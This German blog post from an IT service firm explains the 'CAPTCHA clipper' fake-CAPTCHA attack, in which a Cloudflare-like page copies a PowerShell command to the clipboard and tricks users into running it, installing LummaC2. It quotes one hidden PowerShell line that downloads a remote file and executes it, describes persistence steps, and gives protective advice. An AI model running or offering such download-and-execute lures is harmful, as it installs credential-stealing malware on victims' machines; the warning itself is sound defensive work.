Fake CAPTCHA als Malware-Risiko: BSI rät zu besonderer Vorsicht

Die dunkle Seite der CAPTCHAs

CAPTCHAs sind seit Jahrzehnten ein bewährtes Mittel, um Websites vor automatisierten Angriffen zu schützen. Sie verlangen vom Nutzer, bestimmte Bilder auszuwählen, Zeichen einzugeben oder einfach ein Häkchen zu setzen, um zu beweisen, dass sie keine Bots sind. Genau dieses Vertrauen in CAPTCHAs wird jetzt von Cyberkriminellen missbraucht, um ahnungslose Nutzer zur unbeabsichtigten Installation von Malware zu verleiten.

Fake Captcha Malware

Eine besonders raffinierte Angriffskette wurde vom Conscia Security Operations Center (SOC) entdeckt und als CAPTCHA clipper bezeichnet. Die Methode kombiniert Social Engineering mit technischer Manipulation, um Nutzer zur Ausführung schädlicher PowerShell-Befehle zu bringen.

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) sowie das Schweizerische Bundesamt für Cybersicherheit (BACS) warnen mittlerweile offiziell vor diesen Attacken.

Technische Analyse der CAPTCHA clipper-Angriffskette

Die Angriffsmethode nutzt mehrere Schritte, um den Schadcode auf den Systemen der Opfer auszuführen. Dabei wird eine Kombination aus JavaScript-Manipulation, PowerShell-Missbrauch und Command-and-Control (C2)-Kommunikation verwendet. Die folgenden Schritte beschreiben die technischen Hintergründe dieses raffinierten Angriffs.

1. Initiale Infektion: Das präparierte CAPTCHA

Der Angriff beginnt mit einer präparierten Webseite, die ein vermeintlich legitimes CAPTCHA enthält. Die technische Manipulation erfolgt über eingebettetes JavaScript, das eine bösartige Nutzlast vorbereitet.

Wie das bösartige CAPTCHA funktioniert:

  • Nutzer stoßen auf eine gefälschte Website, die ein Cloudflare-ähnliches CAPTCHA anzeigt.
  • Sobald das Häkchen bei „Ich bin kein Roboter“ gesetzt wird, wird unbemerkt ein PowerShell-Befehl in die Zwischenablage kopiert.
  • Ein zweites Pop-up-Banner erscheint mit Anweisungen zur Tastatureingabe. Hier werden Nutzer dazu gebracht:
  1. Win + R zu drücken, um das Ausführen-Fenster zu öffnen.
  2. Strg + V zu nutzen, um den schädlichen PowerShell-Befehl aus der Zwischenablage einzufügen.
  3. Enter zu drücken, wodurch der Befehl ohne das Wissen des Nutzers ausgeführt wird.

2. Der PowerShell-Angriff

Der kopierte PowerShell-Befehl ist darauf ausgelegt, Schadsoftware direkt aus dem Internet zu laden und auszuführen. Ein Beispiel für einen solchen Befehl nennt Consica im Blogartikel:

powershell -WindowStyle Hidden -Command “$rQd=‘https://xxxxxxxxxxxxx[.]net/prizev2[.]txt’; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;”

Was passiert bei der Ausführung dieses Befehls?

  • Die Datei prizev2.txt wird von einem externen Server geladen.
  • Diese Datei enthält weitere verschlüsselte Schadcode-Befehle, die mit Invoke-Expression direkt in der PowerShell ausgeführt werden.
  • Die Malware wird direkt im Speicher ausgeführt, um klassische Antiviren-Scanner zu umgehen.
  • In vielen Fällen wird eine Backdoor geöffnet, um weitere Schadsoftware herunterzuladen.

3. Installation und Persistenz

Nach der initialen Infektion installiert sich die Malware, indem sie:

  • Eine ZIP-Datei (prize.zip) von einem externen Server herunterlädt.
  • Die enthaltene Datei setup.exe ins APPDATA-Verzeichnis extrahiert und automatisch startet.
  • Persistenzmechanismen nutzt, darunter:
  • Eintrag in den Windows-Taskplaner, um sich nach jedem Neustart erneut auszuführen.
  • Erstellung einer zusätzlichen Datei (69HT8K.pif), die als Tarnung oder für weitere Angriffe genutzt wird.

Verwendete Techniken in der Übersicht

Die CAPTCHAclipper-Angriffskette setzt eine Vielzahl moderner Angriffstechniken ein:

TechnikErklärung
Social EngineeringNutzer werden durch bekannte Sicherheitsmechanismen (CAPTCHA) in falscher Sicherheit gewogen und zu gefährlichen Handlungen verleitet.
Clipboard HijackingSchadcode wird unbemerkt in die Zwischenablage kopiert und durch Nutzer selbst eingefügt.
Fileless MalwareSchadcode wird direkt im Arbeitsspeicher ausgeführt, ohne Dateien auf der Festplatte zu hinterlassen.
PowerShell ExploitationDie PowerShell wird als legitimes Windows-Werkzeug genutzt, um Befehle zu laden und auszuführen.
C2-KommunikationDie Malware baut eine Verbindung zu einem Angreifer-Server auf, um weitere Befehle zu empfangen.
Persistenz-MechanismenAutomatischer Neustart durch den Taskplaner oder das Eintragen ins APPDATA-Verzeichnis.

Wer steckt hinter den Angriffen?

Laut Conscia Security Operations Center (SOC) handelt es sich um einen erfahrenen Bedrohungsakteur, der gezielt Nutzer in Europa angreift. Die Hauptnutzlast wurde als eine Variante der LummaC2-Malware identifiziert, die darauf ausgelegt ist:

  • Zugangsdaten aus Webbrowsern und Messenger-Apps zu stehlen.
  • Kreditkarteninformationen abzugreifen.
  • Befehle auszuführen, um weitere Schadsoftware zu installieren.

Ein genaues Attributionsmodell liegt noch nicht vor, jedoch weisen die Angriffe auf eine hochentwickelte Gruppe hin, die in der Lage ist, ihre Angriffsstrategien dynamisch anzupassen, um Sicherheitslösungen zu umgehen.


Wie kann man sich schützen?

Um sich vor dieser neuen Angriffsmethode zu schützen, sollten Nutzer folgende Maßnahmen ergreifen:

1. Sicherheitsbewusstes Verhalten

  • Keine Tastenkombinationen auf unbekannten Webseiten ausführen!
  • Falls nach einem CAPTCHA eine zusätzliche Anweisung erscheint, sofort den Browser schließen.
  • Besondere Vorsicht bei Werbebannern oder Pop-ups, die eine Aktion verlangen.

2. Technische Schutzmaßnahmen

  • PowerShell restriktiver konfigurieren, z. B. durch Gruppenrichtlinien (Set-ExecutionPolicy Restricted).
  • Zwischenablage-Überwachung aktivieren, um unerwartete Inhalte zu blockieren.
  • Nutzung eines modernen Virenschutzes mit heuristischer Analyse.

3. Was tun im Infektionsfall?

Sollte der Verdacht bestehen, dass der eigene Rechner infiziert wurde:

  1. Sofort das Gerät vom Netzwerk trennen.
  2. Alle Passwörter ändern, insbesondere für Online-Banking und E-Mail-Konten.
  3. Den Rechner neu aufsetzen, um sicherzustellen, dass keine versteckte Schadsoftware aktiv bleibt.

Laut dem BSI und dem BACS sollten betroffene Systeme vollständig gelöscht und neu installiert werden, da moderne Malware oft tief ins System eingreift und nicht ohne Weiteres entfernt werden kann.

Fazit: Ein Weckruf für IT-Sicherheit

Die CAPTCHAclipper-Angriffe zeigen, wie Cyberkriminelle zunehmend kreative Methoden nutzen, um Sicherheitsmaßnahmen in Angriffsvektoren zu verwandeln. Durch die geschickte Kombination aus technischen Exploits und psychologischer Manipulation gelingt es den Tätern, Nutzer unbemerkt in die Falle zu locken.

Besonders besorgniserregend ist, dass die genutzten Techniken leicht angepasst und wiederverwendet werden können. Auch wenn bereits einige Sicherheitslösungen die erkannten Indikatoren für Kompromittierung (IOCs) blockieren, werden neue Varianten entstehen.

Nutzer und Unternehmen müssen daher wachsam bleiben, ihre IT-Sicherheitsstrategien kontinuierlich aktualisieren und sich stets bewusst sein: Nicht jedes CAPTCHA ist harmlos.

Wie hilfreich war dieser Beitrag?

Klicke auf die Sterne um zu bewerten!

Es tut uns leid, dass der Beitrag für dich nicht hilfreich war!

Lasse uns diesen Beitrag verbessern!

Wie können wir diesen Beitrag verbessern?

Meroth IT-Service ist Ihr lokaler IT-Dienstleister in Frankfurt am Main für kleine Unternehmen, Selbstständige und Privatkunden


Kostenfreie Ersteinschätzung Ihres Anliegens?

❱ Nehmen Sie gerne Kontakt auf ❰

Werbung

WD_BLACK SN7100 NVMe SSD 2 TB (High-Performance Gaming-Speicher, bis zu 7.250 MB/s Lesen, PCIe Gen4, Energieeffizienz, für Desktop, Laptop & Handheld-Spielekonsolen) - POWERED BY SANDISKℹ︎
€ 258,00
Nur noch 2 auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 264,99
Preise inkl. MwSt., zzgl. Versandkosten
€ 289,00
Preise inkl. MwSt., zzgl. Versandkosten
NETGEAR 8-Port Gigabit Ethernet Plus Switch (GS108E): Managed, Desktop- oder Wandmontage und eingeschränkte Garantie über die gesamte Lebensdauerℹ︎
Ersparnis 12%
UVP**: € 41,99
€ 36,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 36,99
Preise inkl. MwSt., zzgl. Versandkosten
€ 36,90
Preise inkl. MwSt., zzgl. Versandkosten
Anker Nano 65W USB C Ladegerät, 3-Port PPS Schnellladegerät, iPad Ladegerät, Kompaktes Netzteil für MacBook Pro, iPad Pro, Galaxy S20, Dell XPS 13, Note 20, iPhone 17/16/15 Series,Pixelsℹ︎
Ersparnis 10%
UVP**: € 41,99
€ 37,79
Nur noch 19 auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Anker Nano II 65W USB C Ladegerät Netzteil mit Schnellladeleistung, GaN II Technologie, Kompatibel mit MacBook Pro/Air, Galaxy S20/S10, iPhone 17/Pro/iPhone Air/16/15, iPad, Pixel (Schwarz)ℹ︎
Kein Angebot verfügbar.
HP Laptop mit 17,3" FHD Display, AMD Ryzen 5 7520U, 8GB DDR5 RAM, 512 GB SSD, AMD Radeon-Grafik, Windows 11, QWERTZ, Schwarz inkl. 25 GB Dropbox-Speicher für 12 Monateℹ︎
Ersparnis 4%
UVP**: € 500,75
€ 478,84
Nur noch 2 auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
NETGEAR GS305E Managed Switch 5 Port Gigabit Ethernet LAN Switch Plus (Plug-and-Play, Netzwerk Switch Managed, IGMP Snooping, QoS, VLAN, lüfterlos, Robustes Metallgehäuse), Schwarzℹ︎
Ersparnis 8%
UVP**: € 25,99
€ 23,95
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 24,05
Preise inkl. MwSt., zzgl. Versandkosten
Lenovo Idea Tab Pro Tablet 32,7 cm (12,7 Zoll), 3K, Matte Edition (MediaTek Dimensity 8300, 8 GB RAM, 128 GB UFS 3.1, 144 Hz, Wi-Fi 6E, Bluetooth 5.3, Android 14), Mondgrau, inklusive Tab Pen Plusℹ︎
€ 380,01
Nur noch 4 auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
HP Inkjet Printer, Schwarz mit Tricolor, Multipackℹ︎
€ 25,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 24,02
Preise inkl. MwSt., zzgl. Versandkosten
€ 25,99
Preise inkl. MwSt., zzgl. Versandkosten
Lenovo IdeaPad Slim 5 (14", 512 GB, 16 GB, Deutschland, Intel Core i7-13620H), Notebook, Grauℹ︎
€ 687,68
Preise inkl. MwSt., zzgl. Versandkosten
Ersparnis 5%
UVP**: € 729,00
€ 692,25
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
TP-Link WLAN Powerline Adapter Triple Set TL-WPA4220 TKIT (600Mbit/s, WLAN 300Mbit/s, Wi-Fi Clone, Fast-Ethernet-LAN, Plug&Play, Kompatibel mit Allen HomePlug AV/AV2 Powerline Adaptern)ℹ︎
Ersparnis 15%
UVP**: € 99,90
€ 85,08
Nur noch 1 auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Lenovo Yoga Slim 7i AI Laptop | 14'' WUXGA OLED Display | Intel Core Ultra 7 | 32GB RAM | 1TB SSD | Intel Arc Grafik | Win11 | QWERTZ | Luna grau | Beleuchtete Tastatur | 3 Monate Premium Careℹ︎
€ 1.541,15
Nur noch 1 auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Eve Thermo - Smartes Heizkörperthermostat & Door & Window Matter – Smarter Kontaktsensor für Türen & Fenster, Haussicherheitℹ︎
Ersparnis 38%
UVP**: € 119,90
€ 74,65
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
FRITZ!Box 5690 Pro (Wi-Fi 7 Premium DSL- und Glasfaser-Router mit Triband (2,4 GHz, 5 GHz, 6 GHz) bis zu 18,5 GBit/s, für Glasfaser & DSL-Anschlüsse, WLAN Mesh, DECT-Basis, deutschsprachige Version)ℹ︎
Ersparnis 20%
UVP**: € 369,00
€ 294,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Apple MacBook Air (13", Apple M4 Chip mit 10‑Core CPU und 8‑Core GPU, 16GB Gemeinsamer Arbeitsspeicher, 256 GB) - Himmelblauℹ︎
Ersparnis 13%
UVP**: € 979,00
€ 855,00
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 855,00
Preise inkl. MwSt., zzgl. Versandkosten
NETGEAR Nighthawk Tri-Band-WiFi 6E-Router (RAXE300) – Sicherheitsfunktionen, AXE7800 WLAN-Gigabit-Geschwindigkeit (bis zu 7,8 Gbit/s), neues 6-GHz-Band, 8-Streams decken bis zu 185 m2 und 40 Geräte abℹ︎
Ersparnis 6%
UVP**: € 264,74
€ 249,97
Nur noch 3 auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
TP-Link WLAN Powerline Adapter TL-WPA4220 WLAN 300Mbit/s, AV600 Powerline, Zusatzeinheit, Es kann Nicht alleine verwendet Werdenℹ︎
€ 41,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
ℹ︎ Werbung / Affiliate-Links: Wenn Sie auf einen dieser Links klicken und einkaufen, erhalte ich eine Provision. Für Sie verändert sich der Preis dadurch nicht. Zuletzt aktualisiert am 17. März 2026 um 1:29. Die hier gezeigten Preise können sich zwischenzeitlich auf der Seite des Verkäufers geändert haben. Alle Angaben ohne Gewähr.
(**) UVP: Unverbindliche Preisempfehlung

Preise inkl. MwSt., zzgl. Versandkosten
Abonnieren
Benachrichtige mich bei
0 Kommentare
Inline Feedbacks
Alle Kommentare anzeigen
Nach oben scrollen